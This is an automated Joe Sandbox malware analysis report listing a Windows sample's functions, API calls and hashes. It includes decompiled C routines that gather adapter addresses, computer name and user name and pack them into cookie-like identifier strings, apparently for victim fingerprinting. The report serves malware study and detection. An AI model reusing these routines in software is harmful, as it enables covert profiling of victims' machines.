Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b5cc965574531a38da82e62e5c964f7ddff0bacc34e60ed516740bfb50cc9259
Instruction ID: 8cbfaebe298cb4ca62b9bf11414534abaf268a42e8956053f3f221c27f3210cb
Opcode Fuzzy Hash: b5cc965574531a38da82e62e5c964f7ddff0bacc34e60ed516740bfb50cc9259
Instruction Fuzzy Hash: 8DF05431631226AADF335E629C06B5B7758AF82772F284562BC24961D0CB70D87886A9

Uniqueness

Uniqueness Score: -1.00%

Function 0025AFAC, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0024A489,?), ref: 0025AFDE

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d796fc83781c58054635c4a6631442d430caf9defa7c05e621c7a39c329c791b
Instruction ID: a04b13e1eef924ed13b1d3f64e6bc66cdfa617bcffa861b5f9e890ca7e2d3fce
Opcode Fuzzy Hash: d796fc83781c58054635c4a6631442d430caf9defa7c05e621c7a39c329c791b
Instruction Fuzzy Hash: A1E0E5711342136BD6213E61AC07F5A364CAB913B3F140321EC09969C0CFB2CC3886AF

Uniqueness

Uniqueness Score: -1.00%

Function 00118BC6, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00118BCD

Part of subcall function 0011A845: RtlEnterCriticalSection.NTDLL(00287CD8), ref: 0011A876
Part of subcall function 0011A845: RtlInitializeCriticalSection.NTDLL(00000000), ref: 0011A88C
Part of subcall function 0011A845: RtlLeaveCriticalSection.NTDLL(00287CD8), ref: 0011A89A
Part of subcall function 0011A845: RtlEnterCriticalSection.NTDLL(00000000), ref: 0011A8A7

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: 7d510c0f255cb8e420b91064042722c2327507ffcf9970cd9f230f8edc7bfe74
Instruction ID: aae1ec1fc52412aa5fe53dc98eb437672fe9d820c786de9d5e513a761b393fdb
Opcode Fuzzy Hash: 7d510c0f255cb8e420b91064042722c2327507ffcf9970cd9f230f8edc7bfe74
Instruction Fuzzy Hash: FCE01A7452120ADFEB48BBB0C4467CDBB60AF21321F208139E4515A2C5DFB149E29F22

Uniqueness

Uniqueness Score: -1.00%

Function 00146F60, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,?,?,00000000), ref: 00146F7C

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 33c9a9e6e13297bb4b491eb8bbf3d49f6fa0bddd6e2d69b5a119c10cf44cdd2d
Instruction ID: 27d346793e18b3be9f0468977f981aed2c7f5233fc71232dc35b11f6f3689ecc
Opcode Fuzzy Hash: 33c9a9e6e13297bb4b491eb8bbf3d49f6fa0bddd6e2d69b5a119c10cf44cdd2d
Instruction Fuzzy Hash: 6BD0C970140204AFE7019F40EC09BA237B8AB56705F504064F6088E1B0CBB668108BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00127F62, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00127F71

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: DeleteObject
String ID:
API String ID: 1531683806-0
Opcode ID: e778ad974f3409eacef5f0ccbd56568dee166afa521725abc842ff07c056f8d9
Instruction ID: bcc09183509905c4c03bd8414b68d9c125aca9cc10053e33dfa493764eda8a92
Opcode Fuzzy Hash: e778ad974f3409eacef5f0ccbd56568dee166afa521725abc842ff07c056f8d9
Instruction Fuzzy Hash: 23B092B0A0D110AFCF006730AB0C32776545BA130AF209894A02881181EB79C4968510

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00131386, Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 334registryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatW.USER32(000D4740), ref: 001313E0
RegisterClipboardFormatW.USER32(000D4778), ref: 001313F0
RegisterClipboardFormatW.USER32(000D47A8), ref: 00131400
RegisterClipboardFormatW.USER32(000D47D0), ref: 00131410
RegisterClipboardFormatW.USER32(000D47F0), ref: 00131420
RegisterClipboardFormatW.USER32(000D480C), ref: 00131430

Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718

__EH_prolog3_GS.LIBCMT ref: 00131570
GetVersionExW.KERNEL32(00000114), ref: 001315F8
_wcschr.LIBVCRUNTIME ref: 00131758

Strings

|J, xrefs: 00131796
${(, xrefs: 0013139E
@, xrefs: 001316DB

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ClipboardFormatRegister$Exception@8H_prolog3_ThrowVersion_wcschr
String ID: ${($@$|J
API String ID: 3021367414-4130230330
Opcode ID: 5ee366d988156fb60b7b96f632e17c45f764086cd5b2b8087591cdd837c95d23
Instruction ID: 8b6ecf7abc6cc78646b81d5217120905507098a467e7667cba85ad5473e0c72d
Opcode Fuzzy Hash: 5ee366d988156fb60b7b96f632e17c45f764086cd5b2b8087591cdd837c95d23
Instruction Fuzzy Hash: 6ED1D174B00315AFCB18DF24D885BEAB7B4BF49310F05416AF95A97381DB74A894CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 000D1ECF, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 98
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E000D1ECF(void* __ecx) {
				CHAR* _v8;
				void* _v12;
				signed int _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _t23;
				intOrPtr _t29;
				signed int _t37;
				void* _t48;
				CHAR* _t49;
				intOrPtr* _t51;
				long _t52;
				intOrPtr _t54;

				_t37 = 0;
				_v12 = __ecx;
				_v16 = _v16 & 0;
				_v8 = L"; _gid=";
				_t51 = GetProcAddress(LoadLibraryA("IPHLPAPI.DLL"), "GetAdaptersInfo");
				if(_t51 == 0) {
					L6:
					return E000D1BD5(_v12, L"; _gid=", 0xd4610, 1);
				}
				_push( &_v16);
				_push(0);
				if( *_t51() != 0x6f) {
					goto L6;
				}
				_t23 = _v24;
				if(_t23 == 0) {
					goto L6;
				}
				_t48 = HeapAlloc(GetProcessHeap(), 8, _t23 + 1);
				_v12 = _t48;
				if(_t48 == 0) {
					goto L6;
				}
				_push( &_v24);
				_push(_t48);
				if( *_t51() == 0) {
					_t54 = _v28;
					_t52 = _t48;
					_t49 = _v24;
					do {
						if( *((char*)(_t52 + 0x1b0)) != 0x30 ||  *((char*)(_t52 + 0x1b1)) != 0x2e) {
							_t29 =  *((intOrPtr*)(_t52 + 0x190));
							if(_t29 != 0 && _t29 <= 8) {
								_t15 = _t52 + 0x194; // 0x194
								_t37 = _t37 + E000D1BD5(_t37 * 2 + _t54, _t49, _t15, _t29);
								_t49 = ":";
							}
						}
						_t52 =  *_t52;
					} while (_t52 != 0);
					HeapFree(GetProcessHeap(), _t52, _v20);
					if(_t37 == 0) {
						goto L6;
					}
					return _t37;
				}
				HeapFree(GetProcessHeap(), 0, _t48);
				goto L6;
			}

0x000d1edb
0x000d1edd
0x000d1ee1
0x000d1eea
0x000d1eff
0x000d1f03
0x000d1f4e
0x00000000
0x000d1f64
0x000d1f09
0x000d1f0a
0x000d1f10
0x00000000
0x00000000
0x000d1f12
0x000d1f18
0x00000000
0x00000000
0x000d1f2d
0x000d1f2f
0x000d1f35
0x00000000
0x00000000
0x000d1f3b
0x000d1f3c
0x000d1f41
0x000d1f6d
0x000d1f71
0x000d1f73
0x000d1f77
0x000d1f7e
0x000d1f89
0x000d1f91
0x000d1f99
0x000d1fb2
0x000d1fb4
0x000d1fb4
0x000d1f91
0x000d1fb9
0x000d1fbb
0x000d1fce
0x000d1fd6
0x00000000
0x00000000
0x00000000
0x000d1fdc
0x000d1f48
0x00000000

APIs

LoadLibraryA.KERNEL32 ref: 000D1EF2
GetProcAddress.KERNEL32(00000000), ref: 000D1EF9
GetProcessHeap.KERNEL32(00000008,00000001), ref: 000D1F24
HeapAlloc.KERNEL32(00000000), ref: 000D1F27
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1F45
HeapFree.KERNEL32(00000000), ref: 000D1F48
GetProcessHeap.KERNEL32(?,?), ref: 000D1FCB
HeapFree.KERNEL32(00000000), ref: 000D1FCE

Strings

; _gid=, xrefs: 000D1F52
E, xrefs: 000D1EEA
IPHLPAPI.DLL, xrefs: 000D1EE5
GetAdaptersInfo, xrefs: 000D1ED6

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AddressAllocLibraryLoadProc
String ID: ; _gid=$GetAdaptersInfo$IPHLPAPI.DLL$E
API String ID: 2522523987-1525130766
Opcode ID: cc2ab2d0152939180ff220822f1ce57ac75d68b1ceeb86eb4f0a816f91160e21
Instruction ID: 283b03080867f39ec95d427f6045c020d0135ab5295c8c564cedb24cf97c5991
Opcode Fuzzy Hash: cc2ab2d0152939180ff220822f1ce57ac75d68b1ceeb86eb4f0a816f91160e21
Instruction Fuzzy Hash: 4031A0726443016BE320DF65EC45AABBBE8EB85760F05092FFA4593351DF78DC098A71

Uniqueness

Uniqueness Score: -1.00%

Function 0017A7C0, Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 388COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0017A7C7
DeleteObject.GDI32(?), ref: 0017AA13
MulDiv.KERNEL32(?,00000000,00000064), ref: 0017ABAF
MulDiv.KERNEL32(00000064,00000000,00000064), ref: 0017ABCC
MulDiv.KERNEL32(00000000,00000000,00000064), ref: 0017ABEB
MulDiv.KERNEL32(00000028,00000000,00000064), ref: 0017AC08
MulDiv.KERNEL32(?,00000000,00000064), ref: 0017AC24
MulDiv.KERNEL32(00000000,00000000,00000064), ref: 0017AC41

Strings

0, xrefs: 0017A88D
d, xrefs: 0017A81C

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: DeleteH_prolog3Object
String ID: 0$d
API String ID: 2942389277-1143469836
Opcode ID: 8ad414f5a8ffc1d8f78d3532c81b7b89130818df19f1176a0f1c313d39c54ae7
Instruction ID: 0babba40bd0359c16f43211a75868d7e4b65e84fa97abe0be77f489b73cccfca
Opcode Fuzzy Hash: 8ad414f5a8ffc1d8f78d3532c81b7b89130818df19f1176a0f1c313d39c54ae7
Instruction Fuzzy Hash: 39E1EF71A0022A9FDF18DFA9DD45ABE7BB0EF84301F508169F409E7291CB34D911DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 000D1DD9, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E000D1DD9(void* __ecx) {
				char _v256;
				char _v268;
				void* _v280;
				char _v288;
				long _v292;
				char* _t23;
				int _t34;
				int _t36;
				void* _t37;
				WCHAR* _t43;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t53;
				void* _t54;
				void* _t56;

				_t54 =  &_v280;
				_t23 =  &_v256;
				_v280 = 0x100;
				_t37 = __ecx;
				__imp__GetComputerNameExA(0, _t23,  &_v280);
				if(_t23 == 0) {
					_v268 = 0x78;
				}
				_t50 = E000D1B6E(_t37, L"; _u=",  &_v268);
				_v292 = 0x100;
				if(GetUserNameA( &_v268,  &_v292) == 0) {
					_v268 = 0x78;
				}
				_t51 = _t50 + E000D1B6E(_t37 + _t50 * 2, ":",  &_v268);
				_t53 = E000D1725( &_v288);
				_t43 = _t37 + _t51 * 2;
				if(_t53 == 0) {
					_t52 = _t51 + wsprintfW(_t43, L"%s%u", L"; __io=", 0);
				} else {
					_t34 = wsprintfW(_t43, L"%s%u", L"; __io=", _v288);
					_t56 = _t54 + 0x10;
					_t49 = 1;
					_t52 = _t51 + _t34;
					if(_t53 > 1) {
						do {
							_t36 = wsprintfW(_t37 + _t52 * 2, L"%s%u", "_",  *((intOrPtr*)(_t56 + 0x14 + _t49 * 4)));
							_t56 = _t56 + 0x10;
							_t52 = _t52 + _t36;
							_t49 = _t49 + 1;
						} while (_t49 < _t53);
					}
				}
				return _t52;
			}

0x000d1dd9
0x000d1ded
0x000d1df1
0x000d1df8
0x000d1dfa
0x000d1e02
0x000d1e04
0x000d1e04
0x000d1e1c
0x000d1e1e
0x000d1e35
0x000d1e37
0x000d1e37
0x000d1e55
0x000d1e5c
0x000d1e5e
0x000d1e63
0x000d1ec0
0x000d1e65
0x000d1e74
0x000d1e7c
0x000d1e7f
0x000d1e80
0x000d1e84
0x000d1e86
0x000d1e98
0x000d1e9e
0x000d1ea1
0x000d1ea3
0x000d1ea4
0x000d1ea8
0x000d1e84
0x000d1ece

APIs

GetComputerNameExA.KERNEL32(00000000,?,00000000,00000000,7742C0B0,000D45C0,00000000), ref: 000D1DFA
GetUserNameA.ADVAPI32(?,?), ref: 000D1E2D
wsprintfW.USER32 ref: 000D1E74
wsprintfW.USER32 ref: 000D1E98
wsprintfW.USER32 ref: 000D1EB7

Strings

%s%u, xrefs: 000D1E6E, 000D1E92, 000D1EB1
; __io=, xrefs: 000D1E69, 000D1EAC
x, xrefs: 000D1E37
; _u=, xrefs: 000D1E0F

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: wsprintf$Name$ComputerUser
String ID: %s%u$; __io=$; _u=$x
API String ID: 4095488650-3513353778
Opcode ID: 80d6365ec5b02f0179252ab8d344413ae05608d4720bbf5667fd1961b8a7d551
Instruction ID: 83c5162325d9885b1462ac49f34a6106aac796bf471855e5f25dd5f591684e75
Opcode Fuzzy Hash: 80d6365ec5b02f0179252ab8d344413ae05608d4720bbf5667fd1961b8a7d551
Instruction Fuzzy Hash: 9821B532A443046BD320EF60EC45ADB77D8EF84758F440A2BFD45E6346EA75CA0887B2

Uniqueness

Uniqueness Score: -1.00%

Function 0012D175, Relevance: 13.6, APIs: 9, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetPropW.USER32(?), ref: 0012D19B
GlobalFix.KERNEL32(00000000), ref: 0012D1A4
SendMessageW.USER32(?,00000476,00000000,00000000), ref: 0012D1BF
GlobalUnWire.KERNEL32(00000000), ref: 0012D1CA
RemovePropW.USER32(?), ref: 0012D1D9
GlobalFree.KERNEL32(00000000), ref: 0012D1E4

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Global$Prop$FreeMessageRemoveSendWire
String ID:
API String ID: 2896669287-0
Opcode ID: 89e2c9f6f7faa63f677b176e4f022e5439e009570fb3a9bf550142d296f18257
Instruction ID: 750eb684a22f8ee6624e764d167d2e662c25de3095a5e61813db51d6d79a3c31
Opcode Fuzzy Hash: 89e2c9f6f7faa63f677b176e4f022e5439e009570fb3a9bf550142d296f18257
Instruction Fuzzy Hash: F7216F31700321EFDB256B71FC4CB667ABEFB9A752F144025F94292560DFB0E860DA60

Uniqueness

Uniqueness Score: -1.00%

Function 00125BE6, Relevance: 10.6, APIs: 7, Instructions: 131fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00125BF0
GetFullPathNameW.KERNEL32(?,00000104,00000000,?,00000268,001254A3,?,?,00000000), ref: 00125C20

Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718

PathIsUNCW.SHLWAPI(?,?,?,00000000), ref: 00125C98
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00125CBC
CharUpperW.USER32(?), ref: 00125CEA
FindFirstFileW.KERNEL32(?,?), ref: 00125D02
FindClose.KERNEL32(00000000), ref: 00125D0E

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3_InformationNameThrowUpperVolume
String ID:
API String ID: 2181567148-0
Opcode ID: a3deabaf615c865492edd2d0a25457835f81d33decbc7848f367f8baba683208
Instruction ID: 70b513302cd94069c5606b8fa535e40abe40178164755dd9ebc6900ab31af8f7
Opcode Fuzzy Hash: a3deabaf615c865492edd2d0a25457835f81d33decbc7848f367f8baba683208
Instruction Fuzzy Hash: AE41A3B1504625ABDB28BB60EDCDFBE777EFF50310F1046A9F415A2141EB319EA1CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00256C80, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON

Download Yara Rule

Strings

]9&, xrefs: 002570A7, 00256EE5, 00256EED
]9&, xrefs: 00256C9B, 00256E24, 0025704D, 00256FE7, 00256E73, 00256DF9

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID:
String ID: ]9&$]9&
API String ID: 0-623334917
Opcode ID: 675ccee7c228a12c69f89996fa42595af3b5340bd651056006d88a0312ababc0
Instruction ID: 81b65d3bc32fc13b81e04878f01e2a827ec69f6039f5c0ca79975101b26ae921
Opcode Fuzzy Hash: 675ccee7c228a12c69f89996fa42595af3b5340bd651056006d88a0312ababc0
Instruction Fuzzy Hash: 02F17F71E1121A9FDF14CFA8D8806AEB7F1FF48315F258269E819A7380D731AD15CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00152C34, Relevance: 6.5, APIs: 4, Instructions: 504COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00152C3E
GetObjectW.GDI32(?,00000018,?), ref: 00152CFF
DeleteObject.GDI32(?), ref: 00152DD5
DeleteObject.GDI32(?), ref: 001531E6

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$Delete$H_prolog3
String ID:
API String ID: 487261545-0
Opcode ID: 688081854a68e882ec82d7673242e0a4af26c3c0699a0582ee50d81092b0bc2d
Instruction ID: 4315b95dc71c0f6a9e1973879d97206bb7c8211e39990267e8d3d65f733746ae
Opcode Fuzzy Hash: 688081854a68e882ec82d7673242e0a4af26c3c0699a0582ee50d81092b0bc2d
Instruction Fuzzy Hash: 38222871E00719DFCB24CFA9D98079DBBB1FF49300F1181AAD869AB251DB709A99CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0012D0B0, Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,00000005,?,?,?,?,?,0012BCF4,?,?), ref: 0012D0D2
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,0012BCF4,?,?), ref: 0012D0E7
LockResource.KERNEL32(00000000,?,?,?,?,?,0012BCF4,?,?), ref: 0012D0F9
GlobalFree.KERNEL32(?), ref: 0012D138

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Resource$FindFreeGlobalLoadLock
String ID:
API String ID: 3898064442-0
Opcode ID: 3d02bc84300a00aa0a8798a531c9ebb09772f9ee302419945a815b507cb584a5
Instruction ID: 738507350588528b206e9c28d9781a3dd4447cab9805b57585add6659aff9117
Opcode Fuzzy Hash: 3d02bc84300a00aa0a8798a531c9ebb09772f9ee302419945a815b507cb584a5
Instruction Fuzzy Hash: 3E11B135100710AFCB15ABA5F889B6AB7F5EFD5322F25806CF85983661DF71DC219B10

Uniqueness

Uniqueness Score: -1.00%

Function 002498CA, Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,002499E9,000FB6CC,00000017), ref: 002498CF
UnhandledExceptionFilter.KERNEL32(000FB6CC,?,002499E9,000FB6CC,00000017), ref: 002498D8
GetCurrentProcess.KERNEL32(C0000409,?,002499E9,000FB6CC,00000017), ref: 002498E3
TerminateProcess.KERNEL32(00000000,?,002499E9,000FB6CC,00000017), ref: 002498EA

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 49a517360142f15673a41baf5ae4a5d300385efddd3d73f28cef3a78da5093a3
Instruction ID: 05321bb3840422dfe886a25a66e1fd789dddc0a68c8d835cbdf1cd6617892a9f
Opcode Fuzzy Hash: 49a517360142f15673a41baf5ae4a5d300385efddd3d73f28cef3a78da5093a3
Instruction Fuzzy Hash: 9CD0CA32000208ABCB003BE0FC0DB5C3E28AB8A356F840000F30A83021CFB184108B62

Uniqueness

Uniqueness Score: -1.00%

Function 0024F646, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0024A489), ref: 0024F73E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0024A489), ref: 0024F748
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0024A489), ref: 0024F755

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 089454785467cf7f7058b1139c5a890fc42221b7ac8d1fbe7ad89f5d52bacae6
Instruction ID: 639edab06ad2a309094af63fcaec76fbff63dc5bb4dc9503126deb450aaeb925
Opcode Fuzzy Hash: 089454785467cf7f7058b1139c5a890fc42221b7ac8d1fbe7ad89f5d52bacae6
Instruction Fuzzy Hash: AB31E3749112299BCB25DF24ED8978DBBB8FF48310F5041EAE41CA7250EB709F958F45

Uniqueness

Uniqueness Score: -1.00%

Function 00259EEC, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00259EEB,?,?,?,?,?,0024FC18), ref: 00259F0E
TerminateProcess.KERNEL32(00000000,?,00259EEB,?,?,?,?,?,0024FC18), ref: 00259F15
ExitProcess.KERNEL32 ref: 00259F27

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fee16ee7ccd94fd8d37f570e99287faa79a44607d3cba68bde09f2394db70686
Instruction ID: 4211575077d45dac96838344182b209c89a6e03e939542f1305a7e74318b8208
Opcode Fuzzy Hash: fee16ee7ccd94fd8d37f570e99287faa79a44607d3cba68bde09f2394db70686
Instruction Fuzzy Hash: 9FE01231010108EBCB112F54E95DA583B68EB81342B100414F80686531CB7AE9AADE94

Uniqueness

Uniqueness Score: -1.00%

Function 001183DE, Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32(000D13C4), ref: 001183F2
GetLastError.KERNEL32 ref: 00118429

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: DebugErrorLastOutputString
String ID:
API String ID: 4132100945-0
Opcode ID: b347679578338554c1887cea1b6ccc67a7feb60b27102f0a6a7ebeee0e1e3402
Instruction ID: 40229e240b02c546bcc1f8a122979a62cadfa4db9ed7e220a6084a1eb454d89a
Opcode Fuzzy Hash: b347679578338554c1887cea1b6ccc67a7feb60b27102f0a6a7ebeee0e1e3402
Instruction Fuzzy Hash: 17F0B439209237978B2C5BA8BC88BEA7699F715B807648031FD01C2C20DF20DCD1C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 0026404F, Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

o(&, xrefs: 002640B5
o(&, xrefs: 00264056

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID:
String ID: o(&$o(&
API String ID: 0-2791776686
Opcode ID: 399c3278aced804b64ff901822216a5a0360bfef63c2ffc078cbc3d5fe2c15d0
Instruction ID: ffa622eb509a816af8d3dd7f882c28ceb1c90dd6cbe90c0ee5fc1e3e0581a0ba
Opcode Fuzzy Hash: 399c3278aced804b64ff901822216a5a0360bfef63c2ffc078cbc3d5fe2c15d0
Instruction Fuzzy Hash: AC117723F30C255B675C81698C1727A95D2DBD825075F533AD826E7284E994DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 0025BCE8, Relevance: 1.9, APIs: 1, Instructions: 373timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,000FD530), ref: 0025BF2D

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 3a012cac902326d773b3fc29de59c642129d6ac83116bb51e315cec08646b56e
Instruction ID: 23e9859a0fb8a0352c8272b7576e501352e070c11649e74fa5c621ca855c4001
Opcode Fuzzy Hash: 3a012cac902326d773b3fc29de59c642129d6ac83116bb51e315cec08646b56e
Instruction Fuzzy Hash: AEC159759202069FCB269F789C42AEA7BFCEF06351F284059ED80D7291E7308E1DCB58

Uniqueness

Uniqueness Score: -1.00%

Function 00264847, Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00264842,?,?,00000008,?,?,002651A5,00000000), ref: 00264A74

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 2f40cc60a2b539b78dd6bfd98b71d918fcb9c56d8e95c60f75358d7854bdf43a
Instruction ID: a4033cf346ae2b6068e8738798ba6b4bbeb89be646980ee1edb8f1dd356eb4ad
Opcode Fuzzy Hash: 2f40cc60a2b539b78dd6bfd98b71d918fcb9c56d8e95c60f75358d7854bdf43a
Instruction Fuzzy Hash: 71B15931620609DFDB18DF28C496B657BA0FF45365F298658E8DACF2A1C335EDA1CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000D18E0, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 000D1977

Memory Dump Source

